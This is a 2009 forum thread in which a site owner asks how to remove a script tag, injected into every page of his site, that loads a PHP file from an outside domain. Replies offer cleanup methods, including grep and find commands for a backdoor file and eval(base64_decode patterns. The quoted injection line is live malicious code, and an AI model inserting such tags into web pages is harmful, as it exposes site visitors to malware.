1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Urgent help.

Discussion in 'BlackHat Lounge' started by carsonrathi, Nov 17, 2009.

  1. carsonrathi

    carsonrathi Senior Member

    Joined:
    Mar 12, 2008
    Messages:
    1,106
    Likes Received:
    759
    Hey Guys,

    Some one has infected my whole site, on every page i can see one line of code i.e

    <script src=http://bigcjewelryandloan.com/images/brochurefront.php ></script>

    Google has started showing that 'this site may harm your computer' on my sites.

    There are almost 50K pages in my web host, how to remove this line from my each file?

    Thanks,
    Carson
     
  2. riekal

    riekal Junior Member

    Joined:
    Aug 11, 2009
    Messages:
    121
    Likes Received:
    38
    Occupation:
    Marketing & Retargeting Boss
    Location:
    TN
    Do you have SSH access to your web hosting? If so then you're probably running a distro of linux, which means that you can use the shell for string manipulation. Other than that, all I can think of is downloading the webpages, editing that line out and uploading them all back.

    If you DO decide to choose the second option, I'm sure you could find a utility that can find & replace text in multiple files with a press of a button.
     
  3. carsonrathi

    carsonrathi Senior Member

    Joined:
    Mar 12, 2008
    Messages:
    1,106
    Likes Received:
    759
    Hey Guys,

    Thanks for replying.

    However downloading 50000 web pages and re uploading is no way the option. I am sure if hacker can insert is on all pages by some way then it can be removed also (probably by same way)

    Note: I will pay $50 whosoever can REMOVE that virus from my site asap.
     
  4. wawawiwa

    wawawiwa Regular Member

    Joined:
    Jan 24, 2009
    Messages:
    221
    Likes Received:
    87
    it may take up to two weeks before google will take that notice from search engines.
    I can take a look at it. I fixed couple of infected sites before.
    Let me know if you are interested.
     
  5. toph421

    toph421 Newbie

    Joined:
    Feb 8, 2008
    Messages:
    34
    Likes Received:
    84
    Well dude download all the pages, CTRL + F and enter that code then replace with (empty space ) it will be resolved within 2 minutes, You can also connect dreamweaver to your server and remove this code remotely from all pages.

    Thanks

    My 2 cents;)
     
  6. nasgorkam

    nasgorkam Newbie

    Joined:
    Apr 8, 2009
    Messages:
    33
    Likes Received:
    144
    Occupation:
    web designer of hexno.com
    Location:
    j.town
    If the content is in database then you can quick edit it via casual MySQL query and replace
    if the content is html and you run linux you can try riekal suggestion - using shell for string manipulation

    Dont try to connect your dreamweaver to the web with that huge of content, you'll find your program hanging in a long time
     
  7. WeWatch

    WeWatch Newbie

    Joined:
    May 31, 2009
    Messages:
    2
    Likes Received:
    3
    Home Page:
    These types of infections are running rampant through websites. The only thing that will change is the domain, everything else will be pretty much the same.

    This code is remotely injected into various web pages; like index.html, index.php, etc. but it can also be inserted into various other pages.

    If you have SSH access to your site you can use these strings to find it:

    #1: find / -name gifimg.php

    This file is normally used to remotely inject websites with the code dujour. Delete this file. We mostly see this file in any and all images folders.

    #2: from the root of your website type:

    grep -r eval\(base64_decode * | more

    This will give you a list of files that are also used to remotely infect your website.

    #3: grep -r bigcjewelryandloan * | more

    From there, I'm sure there are plenty of grep/vi/utility strings you could use to automatically search and replace the malscript you found, but I would start with the list of files produced by the #3 grep command and remove them.

    I always download all the files from a website and use PowerGrep to automatically find and replace. For some reason, Windows search, doesn't always find these strings.

    Contact me through IM if you want help. I do this all day long and would do it for free for you.
     
  8. sidddd

    sidddd Power Member

    Joined:
    May 15, 2008
    Messages:
    749
    Likes Received:
    460
    Is this is a wordpress site that is hacked?